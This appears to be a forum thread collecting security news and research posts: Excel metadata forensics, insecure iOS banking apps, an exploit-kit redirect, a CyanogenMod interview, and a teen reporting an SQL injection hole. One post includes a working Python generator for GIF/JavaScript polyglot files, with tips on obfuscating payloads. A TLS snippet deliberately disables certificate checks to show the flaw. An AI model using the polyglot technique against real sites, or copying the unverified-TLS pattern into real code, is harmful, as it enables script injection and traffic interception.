[4] https://www.hex-rays.com/products/ida/
[5] https://www.appaddict.org/forum/index.php?/topic/40-how-to-crack-ios-apps/
[6] https://github.com/zynamics/objc-helper-plugin-ida
[7] Apple - Support - Downloads
Cesar at 7:00 AM Sursa: IOActive Labs Research: Personal banking apps leak info through phone
  19. [h=3]MS Excel 2013 Last Saved Location Metadata[/h] The release of Microsoft Office 2013 granted the ability to save files in formats not previously available (such as "Strict OOXML"), but the default format remained the same as Office 2007 and 2010. Despite the common file format, I've found that Microsoft Excel 2013 spreadsheets maintain additional metadata not available in earlier versions of Excel. Specifically, it appears that the absolute path to the directory in which the spreadsheet was last saved is maintained by Excel 2013 spreadsheets. I have not yet found a tool that presents the last saved location with other metadata from an Excel 2013 spreadsheet, but this information can easily be found by opening the "workbook.xml" file embedded in the parent spreadsheet. Simply changing the file extension from "xlsx" to "zip" and using a zip-extraction utility to extract the contents of the spreadsheet is a quick way to gain access to the embedded files without requiring any specialized tools. Workbook.xml contains information about the Excel file such as worksheet names, window height and width parameters, and a bit of other information. For the most part, this XML file appears to be similar across files created using Excel 2007, 2010, and 2013, however, there is one key difference: the "x15ac:absPath" element. The "x15ac:absPath" element is a child element of "mc:Choice" (which is a child element of "mc:AlternateContent") and contains an attribute called "url" that corresponds to the last saved location of the spreadsheet. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Workbook.xml file from Excel 2013[/TD] [/TR] [/TABLE] Information from the "url" attribute could be helpful in many cases, particularly those in which the previous location of a spreadsheet is significant. For example, examining this metadata field in a spreadsheet copied to a USB device could allow the examiner to identify the previous directory in which the spreadsheet was saved (before it was copied to the USB device). It's important to note, however, that resaving a 2013 spreadsheet using Excel 2007 or 2010 appears to remove the "x15ac:absPath" element. If you know that a spreadsheet was created using Excel 2013 but are unable to find the last saved location metadata, it's possible that the spreadsheet was last saved in a version of Excel other than 2013. This can be verified through the "fileVersion" element, which is the first child element of "workbook". The "fileVersion" element includes an attribute called "lastEdited" and, according to Microsoft documentation, the "lastEdited" attribute "specifies the version of the application that last saved the workbook". Interestingly, the value specified in the "lastEdited" attribute is not consistent with the application version of Excel (i.e. 2007=12.x, 2010=14.x, etc.). Instead, this value is a single-digit numeral corresponding to a particular version of Excel. I've ran some quick tests using 2007, 2010, and 2013 and summarized the corresponding fileVersion values for each Excel version in the table below. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]fileVersion Value to Excel Version Mapping[/TD] [/TR] [/TABLE] Importantly, Excel 2013 is aware of the last saved location metadata and will clear this information if the user elects to do so using Excel's built-in Document Inspector. 
Otherwise, this data should travel with the file until it is saved again, at which point this metadata will either be removed or updated (depending on the version of Excel that saved the file). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Excel 2013 Document Inspector identifies Last Saved Location Metadata[/TD] [/TR] [/TABLE] Posted by Jason Hale at 11:35 PM Sursa: Digital Forensics Stream: MS Excel 2013 Last Saved Location Metadata
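Since the spreadsheet is just a ZIP container, both fields can be pulled out with a few lines of Python. The sketch below is my own; it matches the element and attribute names shown above and sidesteps namespace handling by matching on local tag names, printing the lastEdited value and, when present, the absPath url.

import sys
import zipfile
import xml.etree.ElementTree as ET

def last_saved_location(xlsx_path):
    """Read xl/workbook.xml and return (lastEdited, absPath url)."""
    with zipfile.ZipFile(xlsx_path) as zf:
        root = ET.fromstring(zf.read("xl/workbook.xml"))

    last_edited, abs_path = None, None
    for elem in root.iter():
        local = elem.tag.rsplit("}", 1)[-1]      # drop the {namespace} prefix
        if local == "fileVersion":
            last_edited = elem.get("lastEdited")
        elif local == "absPath":
            abs_path = elem.get("url")
    return last_edited, abs_path

if __name__ == "__main__":
    edited, path = last_saved_location(sys.argv[1])
    print("fileVersion lastEdited:", edited)
    print("last saved location:", path or "not present (not last saved by Excel 2013?)")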
  20. Banking apps: insecure and badly written, say researchers Buggy code, bad security By Richard Chirgwin, 13th January 2014 Security researchers IO Active are warning that many smartphone banking apps are leaky and need to be fixed. Testing 40 iOS-based banking apps from 60 banks around the world, the research summary is pretty nerve-wracking: 40 per cent are vulnerable to man-in-the-middle attacks, because they don't validate the authenticity of SSL certificates presented by the server; 20 per cent lacked “Position Independent Executable (PIE) and Stack Smashing Protection enabled”, which IO Active says is used to help mitigate memory corruption attacks; Half the apps are vulnerable to cross-site-scripting (XSS) attacks; Over 40 per cent leave sensitive information in the system log; and Over 30 per cent use hard-coded credentials of some kind. Most worrying, however, are a couple of 90 per cent statistics: the number of apps that included non-SSL links, and the number that lack jailbreak detection. Even those with detection could still be installed: “All of the applications could be installed on a jailbroken iOS device. This helped speed up the static and black box analysis”, writes IO Active's Ariel Sanchez. By including non-SSL links in the apps, Sanchez says, an attacker could “intercept the traffic and inject arbitrary JavaScript/HTML code in an attempt to create a fake login prompt or similar scam.” “Moreover, it was found that 50% of the apps are vulnerable to JavaScript injections via insecure UIWebView implementations. In some cases, the native iOS functionality was exposed, allowing actions such as sending SMS or emails from the victim’s device,” he continues. This UIWebView implementation allows a false HTML form to be injected. Source: IO Active The IO Active post also details a number of other information leaks, including unencrypted data stored in sqlite databases, and information like IP addresses and application paths that could let a determined and skilled attacker draw inferences about the server-side infrastructure the app is talking to. The research only looked at the client side, Sanchez states, and where possible, IO Active notified banks of the vulnerabilities he identified. ® Sursa: Banking apps: insecure and badly written, say researchers • The Register
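The missing-PIE finding called out in both write-ups can be verified with the same otool -hv check shown in the IOActive post. A small wrapper (hypothetical, requires the Xcode command line tools) simply looks for the PIE flag in the Mach-O header output:

import subprocess
import sys

def has_pie(binary_path):
    """Return True if otool -hv reports the PIE flag for the binary."""
    out = subprocess.run(["otool", "-hv", binary_path],
                         capture_output=True, text=True, check=True).stdout
    return "PIE" in out.split()

if __name__ == "__main__":
    path = sys.argv[1]
    print("%s: PIE %s" % (path, "enabled" if has_pie(path) else "missing"))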
  21. Sneaky Redirect to Exploit Kit Posted on January 12, 2014 by darryl While I was testing a Pinpoint update, I found a sneaky method to redirect unsuspecting users to Neutrino EK. This one was interesting to me so I thought I would document it here. Here's the website I visited… it looks suspicious already: There was a reference to an external JavaScript file: The file is obfuscated JavaScript, which is a red flag: I found the malicious redirect, or so I thought… Long story short, this led nowhere. Going back to the main page, there is a call to a Flash file at the bottom. Reviewing the ActionScript reveals something interesting. It reads in a PNG file called "gray-bg.png", extracts every other character, then evals it. The "PNG" file is not a graphic file but a renamed text file. I used Converter to extract one character every two positions and got this: The URL leads to the Neutrino landing page. Sursa: Sneaky Redirect to Exploit Kit | Kahu Security
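The decoding step is trivial to reproduce: keep one byte out of every two from the fake PNG and you get the script that ends up being evaluated. A short sketch of my own follows; whether the payload starts at offset 0 or 1 is an assumption, so both are tried.

import sys

def decode_every_other(path):
    data = open(path, "rb").read()
    for offset in (0, 1):
        text = data[offset::2].decode("latin-1", "replace")
        print("offset %d: %s" % (offset, text[:200]))

if __name__ == "__main__":
    decode_every_other(sys.argv[1])   # e.g. gray-bg.png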
  22. CyanogenMod: from bedroom Android hack to million dollar mobile OS Interview Third-party mod is set to hit the big time By Matthew Bolton January 11th CyanogenMod is one of the most popular third-party Android ROMs available, with over 8 million users. It's an operating system that's grown from the modding community into a mainstream alternative to what your current mobile phone offers. Hate Samsung's TouchWiz? Then CyanogenMod offers a more grown-up user interface. Fed up with HTC Sense or the vanilla look of pure Android on your Nexus? Then CM brings a viable alternative but there's a predicament that's been weighing on the minds of its development team. "I think that for every one person that does install CyanogenMod, there's maybe five or six that try but don't finish. I had one of our board members try to install it, and he actually gave up," laughs Koushik Dutta, one of CyanogenMod's lead developers (known to the community as Koush). The problem of getting people to actually use its software isn't something the CyanogenMod team has taken lightly. In fact, it's one of the spurs that has pushed the team into turning its community-based, open-source Android spin-off into a full-on business venture: Cyanogen Inc. With $7 million in funding behind it, the core CM team, including Koush and CyanogenMod's founder Steve Kondik (known as Cyanogen), is now working on turning the enthusiast-friendly ROM into a mainstream hit. And the first challenge is making it easy to install. Jumping hurdles "What we hear from everybody is that, 'Yeah, I share this with my friends and I think it's great, but then I tell them what they have to do to install it and they bail'," says Kondik. "So we've made this installer. We say it's one-click, though in reality it's more like three clicks. But we've been doing some pretty extensive usability testing on it, because the big goal here is to get CM to as many people as possible. "We think that the whole walled garden approach is fine, but it's getting tired, and people want an alternative, and we've absolutely proven that. By having this installer, the current growth is just going to go crazy. It's just going to sky rocket." The team behind CyanogenModHe's not joking – after announcing the Cyanogen business, the brand new servers were brought to their knees from 38 million downloads in just one month. And the team was keen to point out that, while the installer is seen as the crucial first step to making CM more popular outside of hardcore Android users, it's only the beginning. "We need to make it really easy to install, and then we have to start building compelling reasons for people to install it," says Koush. "We need to make CyanogenMod really easy to install, and then we have to start building compelling reasons for people to install it." "Right now, the main reason people install it is because what is out there is just… not very good. And I don't want the reason that users come to us to be because the competition isn't good. I want the reason users come to us to be because we're awesome." To get to a point where users are being attracted to CM, the team is taking a few different approaches. One aspect is to build more useful services into the operating system, including network-based services. "We're contracting a really notable security researcher, Moxie Marlinspike, to build a secure messaging/iMessage product for us," says Koush. 
In with the new Another big change will be getting CM installed on phones as the default operating system, starting with a partnership with Oppo on the N1, a new flagship phone. "Oppo had given us support in the past, and when we were forming the company, I told them what was going on. For the global release of the N1, there's an officially supported version of CM, and there's also going to be a limited edition that will actually run CM by default," says Kondik. The Oppo N1 is the first of many official devices"This is just the beginning of bigger things, really. We have the chance to do some experimentation and get everything in place to support something like this, and then next year we'll do something bigger. It's got to be done right, though. "You can't just put some branding on a phone and sell it. You've got to provide something that you can't get elsewhere, especially if you want to make money off the thing. It's going to be important to have a really great platform, really great services. People aren't just going to shell out $800 for a device unless it's really giving them something that they can't get elsewhere." One way to do this is be on a device from a new company, and that's exactly what was announced at CES 2014. It was revealed that Cyanogen Inc was teaming up with a new mobile venture from China - OnePlus. The link? The founder of OnePlus is Pete Lau, a former VP of Oppo. Mass appeal Another opportunity is to use the team's knowledge, and the flexibility of CM's Android roots, to make something new that appeals to a different audience. "CM is absolutely perfect for people who are technical, and everything is designed for people who are technical. We don't want to dumb it down, but we want to wrap some of that stuff in a prettier face. Sometime next year, we're planning on launching something quite a bit bigger that's geared more towards a broader market," says Kondik. "We don't want to dumb CyanogenMod down, but we want to wrap some of that stuff in a prettier face." These plans help to explain why the team wanted to take the chance to push CM further by creating a business around it, but the decision understandably caused some concerns from the community, while some contributors wanted to know whether they would get paid a portion of the new business money for the work they put in. "I think some of the younger guys have this vision that Steve and I got written this seven million dollar check that went into our bank accounts," says Koush. "The money that we got is to build a business, so it's hiring people, paying them, building out an office, paying for the servers that have been donated for so long, paying for bandwidth… Paying for so many different things that it's scary looking through the transactions of our bank account." Keeping competitive The new company has also announced that some of the work it will do will be proprietary, leading to concerns over the future of the open-source project. Kondik understands these fears, but is fairly bullish that they're unfounded. "When you look at Android, it was done with a very specific goal in mind – to really screw up an industry that had gone so far down the proprietary software route that it was hopeless. And they totally succeeded. But now it's happening again, and we're hoping to be the answer to that," he says. "But you have to find a balance. The things that we won't be releasing are the things that give us a competitive edge. We won't release the source code for our installer. That would be crazy." 
"But we don't have any plans to close source any of the existing stuff," he says, definitively. "We're building on top of the open source project. We're not even maintaining a closed fork of CM internally. Anything that we need to do to support our own applications, we'll build the APIs [application programming interface] into the open source side and ship that. Cid is CyanogenMod's slightly angry mascot "Going forward, you're going to see two release branches. One is going to be business as usual, what we're releasing today. Then you're going to see a version that comes with extra stuff that we've done that we think is pretty awesome." "We're in this for the long haul. We think it's going to be a big company. We're not trying to make a quick buck and then get out. Some community members have also worried about the pressure on a business to make money, and how that will affect CM at large. "Right now, we're following the great Silicon Valley idea of 'get the users, and the money will come later'," says Kondik. "We're in this for the long haul. We think it's going to be a big company. We're not trying to make a quick buck and then get out. We're trying to build something important. There's too much time, and too many emotions from too many people involved to give it anything less than what it deserves." Gaining ground It's important for a project like CyanogenMod to remember the emotions and history that went into getting it to where it is today. When Kondik and Koush look back on the early days, they talk about the speed of growth and voracity of its contributors as though they're not quite sure it really happened. The first official phone with Cyanogen Mod was the Oppo N1"A few people had looked at different approaches to building on Android, but when I posted my version up, people seemed to really go crazy over it," says Kondik. "It was really awesome because of how quick people were to try it out and give feedback on what's broken and what could be better. So I kept at it for a few months and more people started using it, more people started submitting patches and wanted to work on it. Koush got involved when the first Motorola Droid hit the shelves, porting CM to it." "For a mass consumer release, 'CyanogenMod' doesn't exactly roll off the tongue." "I recall the first year there was maybe only a dozen guys, and then I disappeared for a year, and I came back and there were a hundred guys," says Koush. "And then a year later there were 500, and now there's 2,000. It's just crazy. It's exponential growth for contributors and for users." But despite all the changes that come from changing from a purely contributor and community-driven project to a well funded business, the team promises that the feel of CyanogenMod won't change. Mascot Cid replaced the popular Andy Bugdroid "A lot of the guys who were on the open source project were going to their day jobs and then hacking on CM for a long time, including myself," says Kondik. "And now we just work on CM the whole time. But one thing that has not changed is working very, very late. Until 5 o'clock in the morning," he laughs. But is it the classic Silicon Valley startup with fun toys around the office? "We have a kegerator!" shouts Kondik, proudly. "And a really nice coffee machine," adds Koush. "I think we're all on the same page; the office is somewhere you want to come into and work, so we don't do cubes. We have a really nice setup and design." 
There is one thing that will change for CyanogenMod when it launches for a mainstream audience, though: the name. The team says that the company will still be called Cyanogen, and the open source project will keep its name, but for reaching a wider audience, the operating system will be called something new.

"Yeah, it's changing…" Koush chuckles. "At some point. For a mass consumer release, 'CyanogenMod' doesn't exactly roll off the tongue."

Sursa: CyanogenMod: from bedroom Android hack to million dollar mobile OS | News | TechRadar
23. [h=2]Hacking through image: GIF turn[/h]

In one of my previous posts I described a way to hack through images. That time I showed how a valid BMP file could be a valid JS file as well, hiding JavaScript operations. Today it's time to describe how this attack works with a more common web file format: .GIF.

Ange commented on my previous post, pointing out his great work on the topic. I recommend having a look at his study (here). What follows is my quick 'n' dirty Python implementation of the technique.

The following HTML page wants to parse a GIF file and a JavaScript file which happen to be the same file: 1.gif_malw.gif. Theoretically the file should be either a valid GIF file or a valid JavaScript file. Could it be a valid JavaScript file and a valid image at the same time? The answer should be NO. But by properly forging the file, the answer is YES, it is.

Let's assume we have the following HTML page. Browsing this file you'll see the result: both tags (img and script) are successfully executed. The img tag shows the black GIF file and the script tag does its great job by executing the JavaScript (alert('test')). How is it possible?

The following image shows one detail of the dirty code that generates the beautiful GIF file. This is not magic at all: it's just my implementation of the GIF parsing bug many libraries have. The idea behind this Python code is to create a valid GIF header containing \x2F\x2A (i.e. "/*") and then close up the end of the image with \x2A\x2F (i.e. "*/"). Before injecting the payload you might inject a simple expression like "=1;" or the most commonly used "=a;" in order to treat the whole GIF block as a variable. The following image shows the first part of a forged GIF header used to exploit this weakness.

After having injected the "padding" characters (in this case I call padding the '=a;' characters, which are needed by the JS interpreter), it's time to inject the real payload. The small script I've written automates this process and you might want to run it in a really easy way. Run it as:

gif.py -i image.gif "alert(\"test\");"

Don't forget, you might want to use obfuscators to better hide your JavaScript, like the following example:

python gif.py -i 2.gif "var _0x9c4c=[\"\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\",\"\x0A\",\"\x4F\x4B\"];var a=_0x9c4c[0];function MsgBox(_0xccb4x3){alert(_0xccb4x3+_0x9c4c[1]+a);} ;MsgBox(_0x9c4c[2]);"

If you want to check and/or download the code, click here. Enjoy your new hackish tool!

Posted by Marco Ramilli

Sursa: Marco Ramilli's Blog: Hacking through image: GIF turn
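To make the trick above concrete, here is a minimal, hypothetical Python sketch of the same GIF/JavaScript polyglot idea. It is not Marco's gif.py (which isn't reproduced in the post): the function name, the use of "=1;" as padding and the specific choice of forcing the logical screen width to 0x2A2F to obtain the "/*" bytes are my own assumptions, and the sketch assumes the image body contains no "*/" sequence and ignores character-encoding corner cases.

#!/usr/bin/env python
# Sketch only, NOT the original gif.py: build a file that is both a GIF and JS.
import struct
import sys

def make_polyglot(gif_path, js_payload, out_path):
    with open(gif_path, "rb") as f:
        data = bytearray(f.read())

    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF file")

    # Bytes 6-7 hold the logical screen width (little-endian). Setting it to
    # 0x2A2F makes the raw bytes read "/*", so, as JavaScript, everything after
    # the leading "GIF89a" identifier becomes one big comment.
    data[6:8] = struct.pack("<H", 0x2A2F)

    # The comment must not be terminated early by a stray "*/" in the image.
    if b"*/" in data[8:]:
        raise ValueError("image body contains '*/', pick another image")

    # Close the comment, neutralise the "GIF89a" identifier with a harmless
    # assignment ("=1;"), then append the real JavaScript payload. Most GIF
    # decoders ignore bytes trailing the image data, so it should still display.
    data += b"*/=1;" + js_payload.encode() + b"\n"

    with open(out_path, "wb") as f:
        f.write(data)

if __name__ == "__main__":
    # e.g. python polyglot.py 1.gif 'alert("test");' 1.gif_malw.gif
    make_polyglot(sys.argv[1], sys.argv[2], sys.argv[3])

Referencing the resulting file from both an img tag and a script tag, as in the HTML page described in the post, should then reproduce the behaviour shown there.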
24. Just how secure is that mobile banking app?
by Paul Ducklin on January 10, 2014

Ariel Sanchez, a researcher at security assessment company IOActive, recently published a fascinating report on the sort of security you can expect if you do your internet banking on an iPhone or iPad. The answer, sadly, seems to be, "Very little."

You should head over to IOActive's blog to read the whole report. Sanchez details the results of a series of offline security tests conducted against 40 different iOS banking apps used by 60 different banks in about 20 different countries. Two problems stood out particularly:

70% of the apps offered no support at all for two-factor authentication.
40% of the apps accepted any SSL certificate for secure HTTP traffic.

Two-factor authentication

Banks are not alone in embracing and promoting two-factor authentication (2FA), also known as two-step verification. Sites like Facebook, Twitter, and Outlook.com all offer, and encourage, the practice, for example by sending you an SMS (text message) containing a one-time passcode every time you try to log in.

The extra security this provides is obvious: crooks who steal your regular username and password are out of luck unless they also steal your mobile phone, without which they won't receive the additional codes they need to log in each time.

You'd think that once a company had gone to the trouble of implementing 2FA for its customers, it would make it available to all its users. But many of the banks, just like the social networks and webmail services, have let their mobile apps lag behind.

No support for 2FA, however, pales into insignificance when compared to the second problem: no HTTPS certificate validation.

The chain of trust

HTTPS certificates rely on a chain of trust, and validating that chain is important. Here's an example of an HTTPS connection, browsing to the "MySophos" download portal using Firefox.

If we click on the [More information...] button, we'll see how the chain of trust runs: GlobalSign vouches for the GlobalSign Extended Validation CA (Certificate Authority), which vouches for Sophos's claim to own sophos.com. And GlobalSign is trusted directly by Firefox itself, with that trust propagating downwards to Sophos's HTTPS certificate.

This chain of trust stops anyone who feels like it from blindly tricking users with a certificate that says, "Hey, folks, this is sophos.com, trust us!" Anyone can create a certificate that makes such a claim, but unless they can also persuade a trusted CA to sign their home-made certificate, you'll see a warning that something fishy is going on when the imposter tries to mislead you. Digging further will explain the problem, namely that you have no reason to trust the certificate's claim that this really is a sophos.com server.

You'll see a similar warning if you visit the imposter site from your iPhone or iPad, too. Again, digging further will reveal the untrusted certificate, and expose the deception, making it clear that you aren't actually dealing with sophos.com at all.

Now remember that in IOActive's report, 40% of iOS banking apps simply didn't produce any warnings of that sort when faced with a fake certificate. You can feed those apps any certificate that claims to validate any website, and the app will blindly accept it.
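The report doesn't reproduce any client code, but the difference between doing validation properly and not doing it at all is easy to illustrate. The following is a small Python sketch (Python rather than iOS code, purely for illustration; the hostname is just an example) contrasting a client that checks the chain of trust and the hostname with one that, like the broken 40%, accepts whatever certificate it is handed:

# Sketch only: strict TLS certificate validation vs. none at all.
import socket
import ssl

HOST = "www.sophos.com"   # example host; any HTTPS site will do

# What a correct client does: verify the certificate chain against the
# system's trusted CAs and check that the certificate matches the hostname.
strict = ssl.create_default_context()
with socket.create_connection((HOST, 443)) as raw:
    with strict.wrap_socket(raw, server_hostname=HOST) as tls:
        print("verified subject:", tls.getpeercert()["subject"])

# What the broken apps effectively do: no CA check, no hostname check, so a
# man-in-the-middle presenting a home-made certificate goes unnoticed.
sloppy = ssl.create_default_context()
sloppy.check_hostname = False        # skip hostname verification
sloppy.verify_mode = ssl.CERT_NONE   # accept any certificate, trusted or not
with socket.create_connection((HOST, 443)) as raw:
    with sloppy.wrap_socket(raw, server_hostname=HOST) as tls:
        print("accepted without verification:", tls.version())

A phishing server presenting a self-signed certificate for the bank's hostname would be rejected by the first connection and silently accepted by the second, which is exactly the failure mode described in the report.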
So, if the banking app is misdirected to a phishing site, for example while you are using an untrusted network such as a Wi-Fi hotspot, you simply won't know! In fact, it's not that you won't notice, but that you can't notice, and this is completely unacceptable.

The silver lining, I suppose, is that 60% of the 40 apps that IOActive tested did notice bogus HTTPS certificates. The problem, though, is how you tell which camp your own bank's app falls into. If you aren't sure, it's probably best just to stick to a full-size computer, and a properly patched browser, for your internet banking.

Ironically, we wrote recently about a move by Dutch banks to set some minimum security standards that they will require customers to follow if they are to qualify for refunds of money stolen through phishing, carding or other forms of online fraud. Sounds as though there may be a spot of "Physician, heal thyself" needed here...

Sursa: Just how secure is that mobile banking app? | Naked Security
25. Teen Reported to Police After Finding Security Hole in Website
By Kim Zetter, 01.08.14, 7:44 PM

[Image: Joshua Rogers. Photo: Simon Schluter]

A teenager in Australia who thought he was doing a good deed by reporting a security vulnerability in a government website was reported to the police.

Joshua Rogers, a 16-year-old in the state of Victoria, found a basic security hole that allowed him to access a database containing sensitive information for about 600,000 public transport users who made purchases through the Metlink web site run by the Transport Department. It was the primary site for information about train, tram and bus timetables. The database contained the full names, addresses, home and mobile phone numbers, email addresses, dates of birth, and a nine-digit extract of credit card numbers used at the site, according to The Age newspaper in Melbourne.

Rogers says he contacted the site after Christmas to report the vulnerability but never got a response. After waiting two weeks, he contacted the newspaper to report the problem. When The Age called the Transportation Department for comment, it reported Rogers to the police.

“It’s truly disappointing that a government agency has developed a website which has these sorts of flaws,” Phil Kernick, of cyber security consultancy CQR, told the paper. “So if this kid found it, he was probably not the first one. Someone else was probably able to find it too, which means that this information may already be out there.”

The paper doesn’t say how Rogers accessed the database, but says he used a common vulnerability that exists in many web sites. It’s likely he used a SQL injection vulnerability, one of the most common ways to breach web sites and gain access to backend databases.

The practice of punishing security researchers instead of thanking them for uncovering vulnerabilities is a tradition that has persisted for decades, despite extensive education about the important role such researchers play in securing systems. The Age doesn’t say whether the police took any action against Rogers.

But in 2011, Patrick Webster suffered a similar consequence after reporting a website vulnerability to First State Super, an Australian investment firm that managed his pension fund. The flaw allowed any account holder to access the online statements of other customers, thus exposing some 770,000 pension accounts — including those of police officers and politicians.

Webster didn’t stop at simply uncovering the vulnerability, however. He wrote a script to download about 500 account statements to prove to First State that its account holders were at risk. First State responded by reporting him to police and demanding access to his computer to make sure he’d deleted all of the statements he had downloaded.

In the U.S., hacker Andrew Auernheimer, aka “weev”, is serving a three-and-a-half-year sentence for identity theft and hacking after he and a friend discovered a hole in AT&T’s website that allowed anyone to obtain the email addresses and ICC-IDs of iPad users. The ICC-ID is a unique identifier that’s used to authenticate the SIM card in a customer’s iPad to AT&T’s network.

Auernheimer and his friend discovered that the site would leak email addresses to anyone who provided it with an ICC-ID. So the two wrote a script to mimic the behavior of numerous iPads contacting the web site in order to harvest the email addresses of about 120,000 iPad users. They were charged with hacking and identity theft after reporting the information to a journalist at Gawker.
Auernheimer is currently appealing his conviction.

Update 1.9.14: Rogers confirmed to WIRED that the vulnerability he found was a SQL-injection vulnerability. He says the police have not contacted him and that he only learned he’d been reported to the police from the journalist who wrote the story for The Age.

Sursa: Teen Reported to Police After Finding Security Hole in Website | Threat Level | Wired.com